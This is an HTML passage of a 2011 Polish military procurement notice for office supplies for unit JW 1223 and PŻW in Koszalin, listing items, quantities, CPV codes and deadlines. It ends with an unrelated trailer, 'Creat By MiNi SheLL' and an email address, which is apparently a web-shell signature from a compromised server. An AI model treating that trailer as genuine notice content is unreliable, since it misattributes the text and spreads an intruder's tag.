<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 1223
ul. 4-go MARCA 5
75-901 KOSZALIN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 08:45, miejsce: JEDNOSTKA WOJSKOWA 1223
ul. 4-go MARCA 5
75-901 KOSZALIN 
Sala Odpraw.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - materiały biurowe dla JW. 1223 Koszalin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	1	Sznurek DRATEW-opakowanie a,250g.stilonowy szewski nabłyszczany biały lub czarny	20	szt

2	Kalka techniczna rolka szer. 110x20 mb 90-95 	10	op
3	Kalka techniczna A-4 opak po 100 szt	5	op
4	Brystol biały, format 70x100, wysoka białość kartonu, minimalna gramatura minimum 450g-m2	200	szt
5	Papier ksero, format A-3 gramatura 80 g-m2, białość CIE 161 lub wyższa, ryza 500 arkuszy	40	ryz
6	Papier ksero, format A-4 gramatura 80 g-m2, kolorowy, ryza 500 arkuszy w minimum 5 kolorach (miks kolorów)	25	ryz
7	Papier ksero, format A-4 gramatura 80 g-m2, kolorowy, ryza 500 arkuszy	25	ryz
8	Papier ploter o szer 914mm x 50 m gramatura 80 g-m2 lub wyższa 	6	op
9	Papier ploter o szer 914mm x 50 m gramatura 80 g-m2 lub wyższa kolor błękitny	3	op

10	Pudło archiwizacyjne Boxy -do przechowywania dokumentów grzbiet 200mm wymiary 350x200x250mm	60	szt
11	Karton wizytówkowy A-4, biały, opakowanie 25 arkuszy, różne faktury, gramatura minimum 246g-m2	20	ryz
12	Koperta biała C-4 samoprzylepne	4000	szt
13	Koperta biała, format C6, samoprzylepna z paskiem 	2000	szt
14	Koperta biała, format C5, samoprzylepna z paskiem typu HK. 	4000	szt
15	Papier samoprzylepny biały A-4	1000	szt
16	Papier samoprzylepny kolor A-4 (żółty, czerwony, zielony, niebieski)	1000	szt
17	Brulion 300 kart A-4 oprawa twarda introligatorska	20	szt
18	Brulion 200 kart A-4 twarda okładka	40	szt
19	Brulion 160 kart A-5 twarda okładka	50	szt
20	Brulion 192 kart B-5 twarda okładka	50	szt
21	Podkładka z zaciskiem, format A-4 (Klip zamykany A-4)	30	szt
22	Okładka do bindowania -tył (opak po 100 szt)- różne kolory,skóropodobna typu Delta,200g-m2	30	op
23	Skoroszyt papierowy A-4	500	szt
24	Teczka do podpisu, minimum 16 przegródek, grzbiet harmonijkowy, na pierwszej okładce okienko do opisania zawartości	4	szt
25	Teczka na gumkę - A-4 kartonowa - różne kolory 	200	szt
26	Teczka wiązana 	500	szt
27	Zeszyt 32 kart A-5	500	szt
28	Zeszyt 60 kart A-5	200	szt
29	Zeszyt 96 kart A-5 twarda okładka	500	szt
30	Zeszyt 96 kart A-4 twarda okładka	500	szt
31	Tusz do stempli w plastikowych pojemnikach 30ml - niebieski-50,czerwony-15 i czarny-15	80	szt
32	Klej biurowy typu PRIT min 50 g w płynie z kulką metalową	400	szt
33	Klej butapren 0,2 puszka	50	szt
34	Klej butapren 0,8 puszka 	30	szt
35	Klej wikol 0,2 kg	20	szt
36	Folia przezroczysta o grubości do 1 mm x 100mb x szer min 3m	2	rolka
37	Folia do laminowania A-4 100mat antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy obustronnie matowa	15	op
38	Folia do laminowania A-4, antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy	20	op
39	Folia do laminowania A-3, antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy	5	op
40	Folia okładki do bindowania  po 100 szt różne kolory	30	op
41	Folia samoprzylepna - szer 1 m	50	m
42	Linijka plastikowa 50 cm, wykonana z trwałego i odpornego na ścieranie tworzywa	100	szt
43	Obwoluta A-5 do segregatora, wykonana z mocnej folii, opakowanie 100 sztuk	100	op
44	Podkład na biurko duży z zasobnikami na przybory piśmiennicze	20	szt
45	Pojemnik na biurko z jeżem duży o wymiarach  dł.22,5xszer.16,7 wys5 cm z plexi, wielokomorowy	25	szt
46	Spinacze biurowe owalny 	300	op
47	Taśma pakowa, brązowa lub przeźroczysta, rozmiar minimalny 48mm x 66	30	szt
48	Taśma nylonowa biało-czerwona 100m na rolce	40	szt
49	Taśma dwustronna piankowa 30mm x 5m	50	szt
50	Taśma klejąca biurowa, przeźroczysta 18mm x 20m	400	szt
51	Półka na dokumenty(Szuflada na dokumenty przezroczysta)	40	szt
52	Identyfikator -holder z klipsem metalowym CT 211 do włożenia  karty magnetycznej o grubości do 
2 mm	500	szt
53	Identyfikator kieszonka dla służb 57x90 mm	50	szt
54	Pinezki srebrne, opakowanie min 50 szt	100	op
55	Pinezki do tablic korkowych, różne kolory, typu beczułki, op.min 25 szt.	100	op
56	Nożyczki 21cm, wykonane z wysokiej jakości stali, rączki wykonane z tworzywa, typu LACO lub równoważne	70	szt
57	Nożyk łamany z blokadą ostrza 18mm	80	szt
58	Blok biurowy 50 kart A-4	50	szt
59	Blok techniczny A-4	50	szt
60	Cienkopis, z końcówka fibrową wzmocnioną metalową obudową, ergonomiczna obudowa o trójkątnym przekroju, system DRY SAFE - umożliwiający pozostawienie bez skuwki do kilku dni. Cienkopisy typu Staedtler lub równoważne	800	szt
61	Datownik, samotuszujący, 8 cyfrowy, typu  Trodat lub równoważny	10	szt
62	Długopis -automatyczny, metalowy, grubość linii pisania 0,32 mm, długość linii pisania 1600 m- wymienny wkład olejowy	1000	szt
63	Wkład do długopisu  -poz  Nr.68	1000	szt
64	Długopis żelowy, automatyczny, umożliwiający pisanie po obu stronach papieru komputerowego, podwójny mechanizm chowania wkładu, tusz pigmentowy, wodoodporny, typu UNI UMN 152 lub równoważny	380	szt
65	Wkład do długopisu żelowego -poz  Nr.64	400	szt
66	Naboje długie do piór wiecznych (WATERMAN),opak. Po 8 szt kolor czarny i niebieski	24	szt
67	Dziurkacz dziurkujący jednorazowo minimum 40 kartek o gramaturze 80g-m2, wykonany z metalu z plastikową nakładką oraz ogranicznikiem formatu	40	szt
68	Dziurkacz archiwistyczny z 4 ostrzami na min 360 kart-typu HP4-360	2	szt
69	Foliopis typu Staedtler, rózne grubości (M, S, F, B), różne 4 kolory lub równoważne	800	szt
70	Grzbiet do bindowania okrągły 6mm, różne kolory	200	szt
71	Grzbiet do bindowania okrągły 10mm, różne kolory	200	szt
72	Grzbiet do bindowania okrągły 15 mm, różne kolory	200	szt
73	Grzbiet do bindowania okrągły 20 mm, różne kolory	200	szt
74	Gumka do stosowania na papierze i folii, nie naruszające struktury wymazywanej powierzchni, nie zostawiająca żadnych śladów, minimalne wymiary: 60x20x10 mm.Gumki typu combi z niebieską częścią, służącą do wycierania atramentu z papieru.	400	szt
75	Korektor w płynie-szybkoschnący poj min 20ml	50	szt
76	Korektor - myszka  typu Pritt, nietoksyczny, nie zawierający rozpuszczalników, odporny na światło, do precyzyjnego korygowania pisma ręcznego, maszynowego oraz komputerowego lub równoważne 	50	szt
77	Korektor w piórze z met końcówką	100	szt
78	Polecenie wyjazdu służbowego 	100	bloczki
79	Kostka - notes 85x85 mm, klejona po jednej z krawędzi, biała lub kolorowa, 500 karteczek	200	szt
80	Kostka - notes samoprzylepny 75x75 mm, różne intensywne kolory, 100 karteczek w bloczku, możliwość wielokrotnego odklejania i przyklejania, typu POST IT lub równoważne	200	szt
81	Listwa GRIPPA A-4 rozmiar 3 kolor szary lub czarny	200	szt
82	Listwa GRIPPA A-4 rozmiar 6 kolor szary lub czarny	200	szt
83	Listwa GRIPPA A-4 rozmiar 9 kolor szary lub czarny	200	szt
84	Listwa GRIPPA A-4 rozmiar 11 kolor szary lub czarny	200	szt
85	Listwa GRIPPA A-4 rozmiar 15 kolor szary lub czarny	200	szt
86	Marker permanentny, okrągła lub ścięta końcówka, metalowa obudowa, różne kolory, możliwość wielokrotnego napełniania, typu Pilot MID F-B lub równoważne -4 kolory	800	szt
87	Marker do tablic suchościeralnych, komplet - 4 sztuki markerów, każdy w innym kolorze oraz gąbka, markery wyposażone w tłoczek dozujący, typu Pentel Maxiflox  lub równoważne	30	szt
88	Ołówek automatyczny, gumowy uchwyt metalowy klips, przycisk do wysuwania grafitów na wysokości uchwytu dłoni typu Pentel PD 305T	350	szt
89	Ołówek  wykonany z żywicy syntetycznej, bezdrzewny, niełamliwy grafiti typu Bic 	450	szt
90	Plastelina 12 kol	100	op
91	Płyn do tablic suchościeralnych a-250ml z rozpylaczem	30	szt
92	Poduszka do stempli 70-110mm (wkład materiałowy)	12	szt
93	Segregator A4 50 mm-75mm, wyposażony w mechanizm dźwigniowy, oklejony na zewnątrz i wewnątrz folią PCV w różnych kolorach, krawędź zabezpieczona metalową szyna, otwór na palec, wymienne etykiety	300	szt
94	Segregator A5 50 mm-75mm, wyposażony w mechanizm dźwigniowy, oklejony na zewnątrz i wewnątrz folią PCV w różnych kolorach, krawędź zabezpieczona metalową szyna, otwór na palec, wymienne etykiety	50	szt
95	Temperówka metalowa  	100	szt
96	Zakreślasz, intensywny atrament pigmentowy, nie rozmazujący się na wszelkiego rodzaju wydrukach, zakreślacze każdy w innym kolorze(4 podstawowe kolory minimum), typu Staedtler lub równoważne	800	szt
97	Zszywacz zszywający minimum 30 kartek o gramaturze 80 g-m2, mocna metalowa obudowa i mechanizm	30	szt
98	Zszywacz długoramienny typu LEITZ - łatwy do ustawienia format zszywania od A6 do A2, skala calowa i milimetrowa	2	szt
99	Zszywacz zszywający od 120- 200 kartek o gramaturze 80 g-m2, mocna metalowa obudowa i mechanizm	2	szt
100	Zszywacz tapicerski	4	szt
101	Zszywki 24-6 - opakowanie 1000 szt	500	op
102	Zszywki tapicerskie opak po - 2500 szt do zszywacza z poz 80	300	op
103	Rozszywacz	50	szt
104	Kredki 12 kolorów (klasy STAEDTLER) w opakowaniu metalowym lub plastikowym	20	op
105	Klips biurowy metalowy - rozmiar 25  ( opak po 12 szt)	10	op
106	Klips biurowy metalowy - rozmiar 32   ( opak po 12 szt)	10	op
107	Klips biurowy metalowy - rozmiar 41   ( opak po 12 szt)	10	op
108	Pojemnik na Dekofleks Plus z plexi, wielokomorowy	8	szt
109	Dekofleks Plus- teczki zawieszane z identyfikatorami(kolor czrny,niebieski, czerwony,zółty)	200	szt
110	Wąsy do skoroszytów opak po 25 szt	10	op
111	Kreda biała tablicowa	55	op
112	Rysiki - grafiti 0,5 opak min po 12szt, twardość 
( H, 2H,HB, B,2B -po 200 opak każdego)	120	op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 39.54.11.30-6, 30.19.91.30-0, 30.19.43.20-4, 30.19.76.44-2, 44.61.71.00-9, 30.19.93.00-3, 30.19.92.30-1, 22.83.00.00-7, 30.19.29.10-3, 30.19.20.00-1, 30.19.30.00-8, 30.19.21.21-5, 30.19.73.30-8, 30.19.70.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - materiały biurowe dla PŻW Koszalin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koperta biała samoprzylepna z paskiem C6144 X 162(op po 50szt.)	2	op. 
2.	Koperta biała samoprzylepna z paskiem C-5162 X 229(op po 500szt.) 	1	op. 
3.	Koperta biała samoprzylepna z paskiem C - 4229 X 324( op po 250 szt.)	3	op. 
4.	Koperta brązowa samoprzylepna z paskiem C-4 229 X 324(op po 250 szt)	2	op. 
5.	Koperta z rozszerzonym bokiem brązowa  E - 4 280x400x40(op po 250 szt.)	1	op. 
6.	Spinacz owalny 	25	op. 
7.	Długopis typu zenith	3	szt.
8.	ołówek	12	szt.
9.	Plastelina	5	op. 
10.	Karteczki samoprzylepne 40x50	25	szt.
11.	koszulka krystaliczna A4	2	op. 
12.	Długopis żelowy G2 PILOT	3	szt.
13.	Wkład żelowy G2 PILOT	10	szt.
14.	PAPIER KSERO A-4 - 500-A-4 80 g-m2	50	ryz.
15.	PAPIER KSERO A-3 - 500-A-3-297*420 80 g-m2	1	ryz.
16.	Brystol kolor - format 70x110(100 białego,28 czerwony,25 żółty)	153	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1, 30.19.70.00-6, 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com